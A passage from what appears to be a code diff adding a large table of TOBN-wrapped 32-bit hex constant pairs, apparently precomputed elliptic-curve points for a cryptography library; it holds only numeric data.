+     TOBN(0x8f3c37dc, 0xc0722677), TOBN(0x10d21be9, 0x1c1c0f27),
+     TOBN(0xd47c8468, 0xe0f7a0c6), TOBN(0x9bf02213, 0xadecc0e0),
+     TOBN(0x0baa7d12, 0x42b48b99), TOBN(0x1bcb665d, 0x48424096),
+     TOBN(0x8b847cd6, 0xebfb5cfb), TOBN(0x87c2ae56, 0x9ad4d10d),
+     TOBN(0xf1cbb122, 0x0de36726), TOBN(0xe7043c68, 0x3fdfbd21),
+     TOBN(0x4bd0826a, 0x4e79d460), TOBN(0x11f5e598, 0x4bd1a2cb),
+     TOBN(0x97554160, 0xb7fe7b6e), TOBN(0x7d16189a, 0x400a3fb2),
+     TOBN(0xd73e9bea, 0xe328ca1e), TOBN(0x0dd04b97, 0xe793d8cc),
+     TOBN(0xa9c83c9b, 0x506db8cc), TOBN(0x5cd47aae, 0xcf38814c),
+     TOBN(0x26fc430d, 0xb64b45e6), TOBN(0x079b5499, 0xd818ea84),
+     TOBN(0xebb01102, 0xc1c24a3b), TOBN(0xca24e568, 0x1c161c1a),
+     TOBN(0x103eea69, 0x36f00a4a), TOBN(0x9ad76ee8, 0x76176c7b),
+     TOBN(0x97451fc2, 0x538e0ff7), TOBN(0x94f89809, 0x6604b3b0),
+     TOBN(0x6311436e, 0x3249cfd7), TOBN(0x27b4a7bd, 0x41224f69),
+     TOBN(0x03b5d21a, 0xe0ac2941), TOBN(0x279b0254, 0xc2d31937),
+     TOBN(0x3307c052, 0xcac992d0), TOBN(0x6aa7cb92, 0xefa8b1f3),
+     TOBN(0x5a182580, 0x0d37c7a5), TOBN(0x13380c37, 0x342d5422),
+     TOBN(0x92ac2d66, 0xd5d2ef92), TOBN(0x035a70c9, 0x030c63c6),
+     TOBN(0xc16025dd, 0x4ce4f152), TOBN(0x1f419a71, 0xf9df7c06),
+     TOBN(0x6d5b2214, 0x91e4bb14), TOBN(0xfc43c6cc, 0x839fb4ce),
+     TOBN(0x49f06591, 0x925d6b2d), TOBN(0x4b37d9d3, 0x62186598),
+     TOBN(0x8c54a971, 0xd01b1629), TOBN(0xe1a9c29f, 0x51d50e05),
+     TOBN(0x5109b785, 0x71ba1861), TOBN(0x48b22d5c, 0xd0c8f93d),
+     TOBN(0xe8fa84a7, 0x8633bb93), TOBN(0x53fba6ba, 0x5aebbd08),
+     TOBN(0x7ff27df3, 0xe5eea7d8), TOBN(0x521c8796, 0x68ca7158),
+     TOBN(0xb9d5133b, 0xce6f1a05), TOBN(0x2d50cd53, 0xfd0ebee4),
+     TOBN(0xc82115d6, 0xc5a3ef16), TOBN(0x993eff9d, 0xba079221),
+     TOBN(0xe4da2c5e, 0x4b5da81c), TOBN(0x9a89dbdb, 0x8033fd85),
+     TOBN(0x60819ebf, 0x2b892891), TOBN(0x53902b21, 0x5d14a4d5),
+     TOBN(0x6ac35051, 0xd7fda421), TOBN(0xcc6ab885, 0x61c83284),
+     TOBN(0x14eba133, 0xf74cff17), TOBN(0x240aaa03, 0xecb813f2),
+     TOBN(0xcfbb6540, 0x6f665bee), TOBN(0x084b1fe4, 0xa425ad73),
+     TOBN(0x009d5d16, 0xd081f6a6), TOBN(0x35304fe8, 0xeef82c90),
+     TOBN(0xf20346d5, 0xaa9eaa22), TOBN(0x0ada9f07, 0xac1c91e3),
+     TOBN(0xa6e21678, 0x968a6144), TOBN(0x54c1f77c, 0x07b31a1e),
+     TOBN(0xd6bb787e, 0x5781fbe1), TOBN(0x61bd2ee0, 0xe31f1c4a),
+     TOBN(0xf25aa1e9, 0x781105fc), TOBN(0x9cf2971f, 0x7b2f8e80),
+     TOBN(0x26d15412, 0xcdff919b), TOBN(0x01db4ebe, 0x34bc896e),
+     TOBN(0x7d9b3e23, 0xb40df1cf), TOBN(0x59337373, 0x94e971b4),
+     TOBN(0xbf57bd14, 0x669cf921), TOBN(0x865daedf, 0x0c1a1064),
+     TOBN(0x3eb70bd3, 0x83279125), TOBN(0xbc3d5b9f, 0x34ecdaab),
+     TOBN(0x91e3ed7e, 0x5f755caf), TOBN(0x49699f54, 0xd41e6f02),
+     TOBN(0x185770e1, 0xd4a7a15b), TOBN(0x08f3587a, 0xeaac87e7),
+     TOBN(0x352018db, 0x473133ea), TOBN(0x674ce719, 0x04fd30fc),
+     TOBN(0x7b8d9835, 0x088b3e0e), TOBN(0x7a0356a9, 0x5d0d47a1),
+     TOBN(0x9d9e7659, 0x6474a3c4), TOBN(0x61ea48a7, 0xff66966c),
+     TOBN(0x30417758, 0x0f3e4834), TOBN(0xfdbb21c2, 0x17a9afcb),
+     TOBN(0x756fa17f, 0x2f9a67b3), TOBN(0x2a6b2421, 0xa245c1a8),
+     TOBN(0x64be2794, 0x4af02291), TOBN(0xade465c6, 0x2a5804fe),
+     TOBN(0x8dffbd39, 0xa6f08fd7), TOBN(0xc4efa84c, 0xaa14403b),
+     TOBN(0xa1b91b2a, 0x442b0f5c), TOBN(0xb748e317, 0xcf997736),
+     TOBN(0x8d1b62bf, 0xcee90e16), TOBN(0x907ae271, 0x0b2078c0),
+     TOBN(0xdf31534b, 0x0c9bcddd), TOBN(0x043fb054, 0x39adce83),
+     TOBN(0x99031043, 0xd826846a), TOBN(0x61a9c0d6, 0xb144f393),
+     TOBN(0xdab48046, 0x47718427), TOBN(0xdf17ff9b, 0x6e830f8b),
+     TOBN(0x408d7ee8, 0xe49a1347), TOBN(0x6ac71e23, 0x91c1d4ae),
+     TOBN(0xc8cbb9fd, 0x1defd73c), TOBN(0x19840657, 0xbbbbfec5),
+     TOBN(0x39db1cb5, 0x9e7ef8ea), TOBN(0x78aa8296, 0x64105f30),
+     TOBN(0xa3d9b7f0, 0xa3738c29), TOBN(0x0a2f235a, 0xbc3250a3),
+     TOBN(0x55e506f6, 0x445e4caf), TOBN(0x0974f73d, 0x33475f7a),
+     TOBN(0xd37dbba3, 0x5ba2f5a8), TOBN(0x542c6e63, 0x6af40066),
+     TOBN(0x26d99b53, 0xc5d73e2c), TOBN(0x06060d7d, 0x6c3ca33e),
+     TOBN(0xcdbef1c2, 0x065fef4a), TOBN(0x77e60f7d, 0xfd5b92e3),
+     TOBN(0xd7c549f0, 0x26708350), TOBN(0x201b3ad0, 0x34f121bf),
+     TOBN(0x5fcac2a1, 0x0334fc14), TOBN(0x8a9a9e09, 0x344552f6),
+     TOBN(0x7dd8a1d3, 0x97653082), TOBN(0x5fc0738f, 0x79d4f289),
+     TOBN(0x787d244d, 0x17d2d8c3), TOBN(0xeffc6345, 0x70830684),
+     TOBN(0x5ddb96dd, 0xe4f73ae5), TOBN(0x8efb14b1, 0x172549a5),
+     TOBN(0x6eb73eee, 0x2245ae7a), TOBN(0xbca4061e, 0xea11f13e),
+     TOBN(0xb577421d, 0x30b01f5d), TOBN(0xaa688b24, 0x782e152c),
+     TOBN(0x67608e71, 0xbd3502ba), TOBN(0x4ef41f24, 0xb4de75a0),
+     TOBN(0xb08dde5e, 0xfd6125e5), TOBN(0xde484825, 0xa409543f),
+     TOBN(0x1f198d98, 0x65cc2295), TOBN(0x428a3771, 0x6e0edfa2),
+     TOBN(0x4f9697a2, 0xadf35fc7), TOBN(0x01a43c79, 0xf7cac3c7),
+     TOBN(0xb05d7059, 0x0fd3659a), TOBN(0x8927f30c, 0xbb7f2d9a),
+     TOBN(0x4023d1ac, 0x8cf984d3), TOBN(0x32125ed3, 0x02897a45),
+     TOBN(0xfb572dad, 0x3d414205), TOBN(0x73000ef2, 0xe3fa82a9),
+     TOBN(0x4c0868e9, 0xf10a5581), TOBN(0x5b61fc67, 0x6b0b3ca5),
+     TOBN(0xc1258d5b, 0x7cae440c), TOBN(0x21c08b41, 0x402b7531),
+     TOBN(0xf61a8955, 0xde932321), TOBN(0x3568faf8, 0x2d1408af),
+     TOBN(0x71b15e99, 0x9ecf965b), TOBN(0xf14ed248, 0xe917276f),
+     TOBN(0xc6f4caa1, 0x820cf9e2), TOBN(0x681b20b2, 0x18d83c7e),
+     TOBN(0x6cde738d, 0xc6c01120), TOBN(0x71db0813, 0xae70e0db),
+     TOBN(0x95fc0644, 0x74afe18c), TOBN(0x34619053, 0x129e2be7),
+     TOBN(0x80615cea, 0xdb2a3b15), TOBN(0x0a49a19e, 0xdb4c7073),
+     TOBN(0x0e1b84c8, 0x8fd2d367), TOBN(0xd74bf462, 0x033fb8aa),
+     TOBN(0x889f6d65, 0x533ef217), TOBN(0x7158c7e4, 0xc3ca2e87),
+     TOBN(0xfb670dfb, 0xdc2b4167), TOBN(0x75910a01, 0x844c257f),
+     TOBN(0xf336bf07, 0xcf88577d), TOBN(0x22245250, 0xe45e2ace),
+     TOBN(0x2ed92e8d, 0x7ca23d85), TOBN(0x29f8be4c, 0x2b812f58),
+     TOBN(0xdd9ebaa7, 0x076fe12b), TOBN(0x3f2400cb, 0xae1537f9),
+     TOBN(0x1aa93528, 0x17bdfb46), TOBN(0xc0f98430, 0x67883b41),
+     TOBN(0x5590ede1, 0x0170911d), TOBN(0x7562f5bb, 0x34d4b17f),
+     TOBN(0xe1fa1df2, 0x1826b8d2), TOBN(0xb40b796a, 0x6bd80d59),
+     TOBN(0xd65bf197, 0x3467ba92), TOBN(0x8c9b46db, 0xf70954b0),
+     TOBN(0x97c8a0f3, 0x0e78f15d), TOBN(0xa8f3a69a, 0x85a4c961),
+     TOBN(0x4242660f, 0x61e4ce9b), TOBN(0xbf06aab3, 0x6ea6790c),
+     TOBN(0xc6706f8e, 0xec986416), TOBN(0x9e56dec1, 0x9a9fc225),
+     TOBN(0x527c46f4, 0x9a9898d9), TOBN(0xd799e77b, 0x5633cdef),
+     TOBN(0x24eacc16, 0x7d9e4297), TOBN(0xabb61cea, 0x6b1cb734),
+     TOBN(0xbee2e8a7, 0xf778443c), TOBN(0x3bb42bf1, 0x29de2fe6),
+     TOBN(0xcbed86a1, 0x3003bb6f), TOBN(0xd3918e6c, 0xd781cdf6),
+     TOBN(0x4bee3271, 0x9a5103f1), TOBN(0x5243efc6, 0xf50eac06),
+     TOBN(0xb8e122cb, 0x6adcc119), TOBN(0x1b7faa84, 0xc0b80a08),
+     TOBN(0x32c3d1bd, 0x6dfcd08c), TOBN(0x129dec4e, 0x0be427de),
+     TOBN(0x98ab679c, 0x1d263c83), TOBN(0xafc83cb7, 0xcef64eff),
+     TOBN(0x85eb6088, 0x2fa6be76), TOBN(0x892585fb, 0x1328cbfe),
+     TOBN(0xc154d3ed, 0xcf618dda), TOBN(0xc44f601b, 0x3abaf26e),
+     TOBN(0x7bf57d0b, 0x2be1fdfd), TOBN(0xa833bd2d, 0x21137fee),
+     TOBN(0x9353af36, 0x2db591a8), TOBN(0xc76f26dc, 0x5562a056),
+     TOBN(0x1d87e47d, 0x3fdf5a51), TOBN(0x7afb5f93, 0x55c9cab0),
+     TOBN(0x91bbf58f, 0x89e0586e), TOBN(0x7c72c018, 0x0d843709),
+     TOBN(0xa9a5aafb, 0x99b5c3dc), TOBN(0xa48a0f1d, 0x3844aeb0),
+     TOBN(0x7178b7dd, 0xb667e482), TOBN(0x453985e9, 0x6e23a59a),
+     TOBN(0x4a54c860, 0x01b25dd8), TOBN(0x0dd37f48, 0xfb897c8a),
+     TOBN(0x5f8aa610, 0x0ea90cd9), TOBN(0xc8892c68, 0x16d5830d),
+     TOBN(0xeb4befc0, 0xef514ca5), TOBN(0x478eb679, 0xe72c9ee6),
+     TOBN(0x9bca20da, 0xdbc40d5f), TOBN(0xf015de21, 0xdde4f64a),
+     TOBN(0xaa6a4de0, 0xeaf4b8a5), TOBN(0x68cfd9ca, 0x4bc60e32),
+     TOBN(0x668a4b01, 0x7fd15e70), TOBN(0xd9f0694a, 0xf27dc09d),
+     TOBN(0xf6c3cad5, 0xba708bcd), TOBN(0x5cd2ba69, 0x5bb95c2a),
+     TOBN(0xaa28c1d3, 0x33c0a58f), TOBN(0x23e274e3, 0xabc77870),
+     TOBN(0x44c3692d, 0xdfd20a4a), TOBN(0x091c5fd3, 0x81a66653),
+     TOBN(0x6c0bb691, 0x09a0757d), TOBN(0x9072e8b9, 0x667343ea),
+     TOBN(0x31d40eb0, 0x80848bec), TOBN(0x95bd480a, 0x79fd36cc),
+     TOBN(0x01a77c61, 0x65ed43f5), TOBN(0xafccd127, 0x2e0d40bf),
+     TOBN(0xeccfc82d, 0x1cc1884b), TOBN(0xc85ac201, 0x5d4753b4),
+     TOBN(0xc7a6caac, 0x658e099f), TOBN(0xcf46369e, 0x04b27390),
+     TOBN(0xe2e7d049, 0x506467ea), TOBN(0x481b63a2, 0x37cdeccc),
+     TOBN(0x4029abd8, 0xed80143a), TOBN(0x28bfe3c7, 0xbcb00b88),
+     TOBN(0x3bec1009, 0x0643d84a), TOBN(0x885f3668, 0xabd11041),
+     TOBN(0xdb02432c, 0xf83a34d6), TOBN(0x32f7b360, 0x719ceebe),
+     TOBN(0xf06c7837, 0xdad1fe7a), TOBN(0x60a157a9, 0x5441a0b0),
+     TOBN(0x704970e9, 0xe2d47550), TOBN(0xcd2bd553, 0x271b9020),
+     TOBN(0xff57f82f, 0x33e24a0b), TOBN(0x9cbee23f, 0xf2565079),
+     TOBN(0x16353427, 0xeb5f5825), TOBN(0x276feec4, 0xe948d662),
+     TOBN(0xd1b62bc6, 0xda10032b), TOBN(0x718351dd, 0xf0e72a53),
+     TOBN(0x93452076, 0x2420e7ba), TOBN(0x96368fff, 0x3a00118d),
+     TOBN(0x00ce2d26, 0x150a49e4), TOBN(0x0c28b636, 0x3f04706b),
+     TOBN(0xbad65a46, 0x58b196d0), TOBN(0x6c8455fc, 0xec9f8b7c),
+     TOBN(0xe90c895f, 0x2d71867e), TOBN(0x5c0be31b, 0xedf9f38c),
+     TOBN(0x2a37a15e, 0xd8f6ec04), TOBN(0x239639e7, 0x8cd85251),
+     TOBN(0xd8975315, 0x9c7c4c6b), TOBN(0x603aa3c0, 0xd7409af7),
+     TOBN(0xb8d53d0c, 0x007132fb), TOBN(0x68d12af7, 0xa6849238),
+     TOBN(0xbe0607e7, 0xbf5d9279), TOBN(0x9aa50055, 0xaada74ce),
+     TOBN(0xe81079cb, 0xba7e8ccb), TOBN(0x610c71d1, 0xa5f4ff5e),
+     TOBN(0x9e2ee1a7, 0x5aa07093), TOBN(0xca84004b, 0xa75da47c),
+     TOBN(0x074d3951, 0x3de75401), TOBN(0xf938f756, 0xbb311592),
+     TOBN(0x96197618, 0x00a43421), TOBN(0x39a25362, 0x07bc78c8),
+     TOBN(0x278f710a, 0x0a171276), TOBN(0xb28446ea, 0x8d1a8f08),
+     TOBN(0x184781bf, 0xe3b6a661), TOBN(0x7751cb1d, 0xe6d279f7),
+     TOBN(0xf8ff95d6, 0xc59eb662), TOBN(0x186d90b7, 0x58d3dea7),
+     TOBN(0x0e4bb6c1, 0xdfb4f754), TOBN(0x5c5cf56b, 0x2b2801dc),
+     TOBN(0xc561e452, 0x1f54564d), TOBN(0xb4fb8c60, 0xf0dd7f13),
+     TOBN(0xf8849630, 0x33ff98c7), TOBN(0x9619fffa, 0xcf17769c),
+     TOBN(0xf8090bf6, 0x1bfdd80a), TOBN(0x14d9a149, 0x422cfe63),
+     TOBN(0xb354c360, 0x6f6df9ea), TOBN(0xdbcf770d, 0x218f17ea),
+     TOBN(0x207db7c8, 0x79eb3480), TOBN(0x213dbda8, 0x559b6a26),
+     TOBN(0xac4c200b, 0x29fc81b3), TOBN(0xebc3e09f, 0x171d87c1),
+     TOBN(0x91799530, 0x1481aa9e), TOBN(0x051b92e1, 0x92e114fa),
+     TOBN(0xdf8f92e9, 0xecb5537f), TOBN(0x44b1b2cc, 0x290c7483),
+     TOBN(0xa711455a, 0x2adeb016), TOBN(0x964b6856, 0x81a10c2c),
+     TOBN(0x4f159d99, 0xcec03623), TOBN(0x05532225, 0xef3271ea),
+     TOBN(0xb231bea3, 0xc5ee4849), TOBN(0x57a54f50, 0x7094f103),
+     TOBN(0x3e2d421d, 0x9598b352), TOBN(0xe865a49c, 0x67412ab4),
+     TOBN(0xd2998a25, 0x1cc3a912), TOBN(0x5d092808, 0x0c74d65d),
+     TOBN(0x73f45908, 0x4088567a), TOBN(0xeb6b280e, 0x1f214a61),
+     TOBN(0x8c9adc34, 0xcaf0c13d), TOBN(0x39d12938, 0xf561fb80),
+     TOBN(0xb2dc3a5e, 0xbc6edfb4), TOBN(0x7485b1b1, 0xfe4d210e),
+     TOBN(0x062e0400, 0xe186ae72), TOBN(0x91e32d5c, 0x6eeb3b88),
+     TOBN(0x6df574d7, 0x4be59224), TOBN(0xebc88ccc, 0x716d55f3),
+     TOBN(0x26c2e6d0, 0xcad6ed33), TOBN(0xc6e21e7d, 0x0d3e8b10),
+     TOBN(0x2cc5840e, 0x5bcc36bb), TOBN(0x9292445e, 0x7da74f69),
+     TOBN(0x8be8d321, 0x4e5193a8), TOBN(0x3ec23629, 0x8df06413),
+     TOBN(0xc7e9ae85, 0xb134defa), TOBN(0x6073b1d0, 0x1bb2d475),
+     TOBN(0xb9ad615e, 0x2863c00d), TOBN(0x9e29493d, 0x525f4ac4),
+     TOBN(0xc32b1dea, 0x4e9acf4f), TOBN(0x3e1f01c8, 0xa50db88d),
+     TOBN(0xb05d70ea, 0x04da916c), TOBN(0x714b0d0a, 0xd865803e),
+     TOBN(0x4bd493fc, 0x9920cb5e), TOBN(0x5b44b1f7, 0x92c7a3ac),
+     TOBN(0xa2a77293, 0xbcec9235), TOBN(0x5ee06e87, 0xcd378553),
+     TOBN(0xceff8173, 0xda621607), TOBN(0x2bb03e4c, 0x99f5d290),
+     TOBN(0x2945106a, 0xa6f734ac), TOBN(0xb5056604, 0xd25c4732),
+     TOBN(0x5945920c, 0xe079afee), TOBN(0x686e17a0, 0x6789831f),
+     TOBN(0x5966bee8, 0xb74a5ae5), TOBN(0x38a673a2, 0x1e258d46),
+     TOBN(0xbd1cc1f2, 0x83141c95), TOBN(0x3b2ecf4f, 0x0e96e486),
+     TOBN(0xcd3aa896, 0x74e5fc78), TOBN(0x415ec10c, 0x2482fa7a),
+     TOBN(0x15234419, 0x80503380), TOBN(0x513d917a, 0xd314b392),
+     TOBN(0xb0b52f4e, 0x63caecae), TOBN(0x07bf22ad, 0x2dc7780b),
+     TOBN(0xe761e8a1, 0xe4306839), TOBN(0x1b3be962, 0x5dd7feaa),
+     TOBN(0x4fe728de, 0x74c778f1), TOBN(0xf1fa0bda, 0x5e0070f6),
+     TOBN(0x85205a31, 0x6ec3f510), TOBN(0x2c7e4a14, 0xd2980475),
+     TOBN(0xde3c19c0, 0x6f30ebfd), TOBN(0xdb1c1f38, 0xd4b7e644),
+     TOBN(0xfe291a75, 0x5dce364a), TOBN(0xb7b22a3c, 0x058f5be3),
+     TOBN(0x2cd2c302, 0x37fea38c), TOBN(0x2930967a, 0x2e17be17),
+     TOBN(0x87f009de, 0x0c061c65), TOBN(0xcb014aac, 0xedc6ed44),
+     TOBN(0x49bd1cb4, 0x3bafb1eb), TOBN(0x81bd8b5c, 0x282d3688),
+     TOBN(0x1cdab87e, 0xf01a17af), TOBN(0x21f37ac4, 0xe710063b),
+     TOBN(0x5a6c5676, 0x42fc8193), TOBN(0xf4753e70, 0x56a6015c),
+     TOBN(0x020f795e, 0xa15b0a44), TOBN(0x8f37c8d7, 0x8958a958),
+     TOBN(0x63b7e89b, 0xa4b675b5), TOBN(0xb4fb0c0c, 0x0fc31aea),
+     TOBN(0xed95e639, 0xa7ff1f2e), TOBN(0x9880f5a3, 0x619614fb),
+     TOBN(0xdeb6ff02, 0x947151ab), TOBN(0x5bc5118c, 0xa868dcdb),
+     TOBN(0xd8da2055, 0x4c20cea5), TOBN(0xcac2776e, 0x14c4d69a),
+     TOBN(0xcccb22c1, 0x622d599b), TOBN(0xa4ddb653, 0x68a9bb50),
+     TOBN(0x2c4ff151, 0x1b4941b4), TOBN(0xe1ff19b4, 0x6efba588),
+     TOBN(0x35034363, 0xc48345e0), TOBN(0x45542e3d, 0x1e29dfc4),
+     TOBN(0xf197cb91, 0x349f7aed), TOBN(0x3b2b5a00, 0x8fca8420),
+     TOBN(0x7c175ee8, 0x23aaf6d8), TOBN(0x54dcf421, 0x35af32b6),
+     TOBN(0x0ba14307, 0x27d6561e), TOBN(0x879d5ee4, 0xd175b1e2),
+     TOBN(0xc7c43673, 0x99807db5), TOBN(0x77a54455, 0x9cd55bcd),
+     TOBN(0xe6c2ff13, 0x0105c072), TOBN(0x18f7a99f, 0x8dda7da4),
+     TOBN(0x4c301820, 0x0e2d35c1), TOBN(0x06a53ca0, 0xd9cc6c82),
+     TOBN(0xaa21cc1e, 0xf1aa1d9e), TOBN(0x32414334, 0x4a75b1e8),
+     TOBN(0x2a6d1328, 0x0ebe9fdc), TOBN(0x16bd173f, 0x98a4755a),
+     TOBN(0xfbb9b245, 0x2133ffd9), TOBN(0x39a8b2f1, 0x830f1a20),
+     TOBN(0x484bc97d, 0xd5a1f52a), TOBN(0xd6aebf56, 0xa40eddf8),
+     TOBN(0x32257acb, 0x76ccdac6), TOBN(0xaf4d36ec, 0x1586ff27),
+     TOBN(0x8eaa8863, 0xf8de7dd1), TOBN(0x0045d5cf, 0x88647c16)}
+    ,
+    {TOBN(0xa6f3d574, 0xc005979d), TOBN(0xc2072b42, 0x6a40e350),
+     TOBN(0xfca5c156, 0x8de2ecf9), TOBN(0xa8c8bf5b, 0xa515344e),
+     TOBN(0x97aee555, 0x114df14a), TOBN(0xd4374a4d, 0xfdc5ec6b),
+     TOBN(0x754cc28f, 0x2ca85418), TOBN(0x71cb9e27, 0xd3c41f78),
+     TOBN(0x89105079, 0x03605c39), TOBN(0xf0843d9e, 0xa142c96c),
+     TOBN(0xf3744934, 0x16923684), TOBN(0x732caa2f, 0xfa0a2893),
+     TOBN(0xb2e8c270, 0x61160170), TOBN(0xc32788cc, 0x437fbaa3),
+     TOBN(0x39cd818e, 0xa6eda3ac), TOBN(0xe2e94239, 0x9e2b2e07),
+     TOBN(0x6967d39b, 0x0260e52a), TOBN(0xd42585cc, 0x90653325),
+     TOBN(0x0d9bd605, 0x21ca7954), TOBN(0x4fa20877, 0x81ed57b3),
+     TOBN(0x60c1eff8, 0xe34a0bbe), TOBN(0x56b0040c, 0x84f6ef64),
+     TOBN(0x28be2b24, 0xb1af8483), TOBN(0xb2278163, 0xf5531614),
+     TOBN(0x8df27545, 0x5922ac1c), TOBN(0xa7b3ef5c, 0xa52b3f63),
+     TOBN(0x8e77b214, 0x71de57c4), TOBN(0x31682c10, 0x834c008b),
+     TOBN(0xc76824f0, 0x4bd55d31), TOBN(0xb6d1c086, 0x17b61c71),
+     TOBN(0x31db0903, 0xc2a5089d), TOBN(0x9c092172, 0x184e5d3f),
+     TOBN(0xdd7ced5b, 0xc00cc638), TOBN(0x1a2015eb, 0x61278fc2),
+     TOBN(0x2e8e5288, 0x6a37f8d6), TOBN(0xc457786f, 0xe79933ad),
+     TOBN(0xb3fe4cce, 0x2c51211a), TOBN(0xad9b10b2, 0x24c20498),
+     TOBN(0x90d87a4f, 0xd28db5e5), TOBN(0x698cd105, 0x3aca2fc3),
+     TOBN(0x4f112d07, 0xe91b536d), TOBN(0xceb982f2, 0x9eba09d6),
+     TOBN(0x3c157b2c, 0x197c396f), TOBN(0xe23c2d41, 0x7b66eb24),
+     TOBN(0x480c57d9, 0x3f330d37), TOBN(0xb3a4c8a1, 0x79108deb),
+     TOBN(0x702388de, 0xcb199ce5), TOBN(0x0b019211, 0xb944a8d4),
+     TOBN(0x24f2a692, 0x840bb336), TOBN(0x7c353bdc, 0xa669fa7b),
+     TOBN(0xda20d6fc, 0xdec9c300), TOBN(0x625fbe2f, 0xa13a4f17),
+     TOBN(0xa2b1b61a, 0xdbc17328), TOBN(0x008965bf, 0xa9515621),
+     TOBN(0x49690939, 0xc620ff46), TOBN(0x182dd27d, 0x8717e91c),
+     TOBN(0x5ace5035, 0xea6c3997), TOBN(0x54259aaa, 0xc2610bef),
+     TOBN(0xef18bb3f, 0x3c80dd39), TOBN(0x6910b95b, 0x5fc3fa39),
+     TOBN(0xfce2f510, 0x43e09aee), TOBN(0xced56c9f, 0xa7675665),
+     TOBN(0x10e265ac, 0xd872db61), TOBN(0x6982812e, 0xae9fce69),
+     TOBN(0x29be11c6, 0xce800998), TOBN(0x72bb1752, 0xb90360d9),
+     TOBN(0x2c193197, 0x5a4ad590), TOBN(0x2ba2f548, 0x9fc1dbc0),
+     TOBN(0x7fe4eebb, 0xe490ebe0), TOBN(0x12a0a4cd, 0x7fae11c0),
+     TOBN(0x7197cf81, 0xe903ba37), TOBN(0xcf7d4aa8, 0xde1c6dd8),
+     TOBN(0x92af6bf4, 0x3fd5684c), TOBN(0x2b26eecf, 0x80360aa1),
+     TOBN(0xbd960f30, 0x00546a82), TOBN(0x407b3c43, 0xf59ad8fe),
+     TOBN(0x86cae5fe, 0x249c82ba), TOBN(0x9e0faec7, 0x2463744c),
+     TOBN(0x87f551e8, 0x94916272), TOBN(0x033f9344, 0x6ceb0615),
+     TOBN(0x1e5eb0d1, 0x8be82e84), TOBN(0x89967f0e, 0x7a582fef),
+     TOBN(0xbcf687d5, 0xa6e921fa), TOBN(0xdfee4cf3, 0xd37a09ba),
+     TOBN(0x94f06965, 0xb493c465), TOBN(0x638b9a1c, 0x7635c030),
+     TOBN(0x76667864, 0x66f05e9f), TOBN(0xccaf6808, 0xc04da725),
+     TOBN(0xca2eb690, 0x768fccfc), TOBN(0xf402d37d, 0xb835b362),
+     TOBN(0x0efac0d0, 0xe2fdfcce), TOBN(0xefc9cdef, 0xb638d990),
+     TOBN(0x2af12b72, 0xd1669a8b), TOBN(0x33c536bc, 0x5774ccbd),
+     TOBN(0x30b21909, 0xfb34870e), TOBN(0xc38fa2f7, 0x7df25aca),
+     TOBN(0x74c5f02b, 0xbf81f3f5), TOBN(0x0525a5ae, 0xaf7e4581),
+     TOBN(0x88d2aaba, 0x433c54ae), TOBN(0xed9775db, 0x806a56c5),
+     TOBN(0xd320738a, 0xc0edb37d), TOBN(0x25fdb6ee, 0x66cc1f51),
+     TOBN(0xac661d17, 0x10600d76), TOBN(0x931ec1f3, 0xbdd1ed76),
+     TOBN(0x65c11d62, 0x19ee43f1), TOBN(0x5cd57c3e, 0x60829d97),
+     TOBN(0xd26c91a3, 0x984be6e8), TOBN(0xf08d9309, 0x8b0c53bd),
+     TOBN(0x94bc9e5b, 0xc016e4ea), TOBN(0xd3916839, 0x11d43d2b),
+     TOBN(0x886c5ad7, 0x73701155), TOBN(0xe0377626, 0x20b00715),
+     TOBN(0x7f01c9ec, 0xaa80ba59), TOBN(0x3083411a, 0x68538e51),
+     TOBN(0x970370f1, 0xe88128af), TOBN(0x625cc3db, 0x91dec14b),
+     TOBN(0xfef9666c, 0x01ac3107), TOBN(0xb2a8d577, 0xd5057ac3),
+     TOBN(0xb0f26299, 0x92be5df7), TOBN(0xf579c8e5, 0x00353924),
+     TOBN(0xb8fa3d93, 0x1341ed7a), TOBN(0x4223272c, 0xa7b59d49),
+     TOBN(0x3dcb1947, 0x83b8c4a4), TOBN(0x4e413c01, 0xed1302e4),
+     TOBN(0x6d999127, 0xe17e44ce), TOBN(0xee86bf75, 0x33b3adfb),
+     TOBN(0xf6902fe6, 0x25aa96ca), TOBN(0xb73540e4, 0xe5aae47d),
+     TOBN(0x32801d7b, 0x1b4a158c), TOBN(0xe571c99e, 0x27e2a369),
+     TOBN(0x40cb76c0, 0x10d9f197), TOBN(0xc308c289, 0x3167c0ae),
+     TOBN(0xa6ef9dd3, 0xeb7958f2), TOBN(0xa7226dfc, 0x300879b1),
+     TOBN(0x6cd0b362, 0x7edf0636), TOBN(0x4efbce6c, 0x7bc37eed),
+     TOBN(0x75f92a05, 0x8d699021), TOBN(0x586d4c79, 0x772566e3),
+     TOBN(0x378ca5f1, 0x761ad23a), TOBN(0x650d86fc, 0x1465a8ac),
+     TOBN(0x7a4ed457, 0x842ba251), TOBN(0x6b65e3e6, 0x42234933),
+     TOBN(0xaf1543b7, 0x31aad657), TOBN(0xa4cefe98, 0xcbfec369),
+     TOBN(0xb587da90, 0x9f47befb), TOBN(0x6562e9fb, 0x41312d13),
+     TOBN(0xa691ea59, 0xeff1cefe), TOBN(0xcc30477a, 0x05fc4cf6),
+     TOBN(0xa1632461, 0x0b0ffd3d), TOBN(0xa1f16f3b, 0x5b355956),
+     TOBN(0x5b148d53, 0x4224ec24), TOBN(0xdc834e7b, 0xf977012a),
+     TOBN(0x7bfc5e75, 0xb2c69dbc), TOBN(0x3aa77a29, 0x03c3da6c),
+     TOBN(0xde0df03c, 0xca910271), TOBN(0xcbd5ca4a, 0x7806dc55),
+     TOBN(0xe1ca5807, 0x6db476cb), TOBN(0xfde15d62, 0x5f37a31e),
+     TOBN(0xf49af520, 0xf41af416), TOBN(0x96c5c5b1, 0x7d342db5),
+     TOBN(0x155c43b7, 0xeb4ceb9b), TOBN(0x2e993010, 0x4e77371a),
+     TOBN(0x1d2987da, 0x675d43af), TOBN(0xef2bc1c0, 0x8599fd72),
+     TOBN(0x96894b7b, 0x9342f6b2), TOBN(0x201eadf2, 0x7c8e71f0),
+     TOBN(0xf3479d9f, 0x4a1f3efc), TOBN(0xe0f8a742, 0x702a9704),
+     TOBN(0xeafd44b6, 0xb3eba40c), TOBN(0xf9739f29, 0xc1c1e0d0),
+     TOBN(0x0091471a, 0x619d505e), TOBN(0xc15f9c96, 0x9d7c263e),
+     TOBN(0x5be47285, 0x83afbe33), TOBN(0xa3b6d6af, 0x04f1e092),
+     TOBN(0xe76526b9, 0x751a9d11), TOBN(0x2ec5b26d, 0x9a4ae4d2),
+     TOBN(0xeb66f4d9, 0x02f6fb8d), TOBN(0x4063c561, 0x96912164),
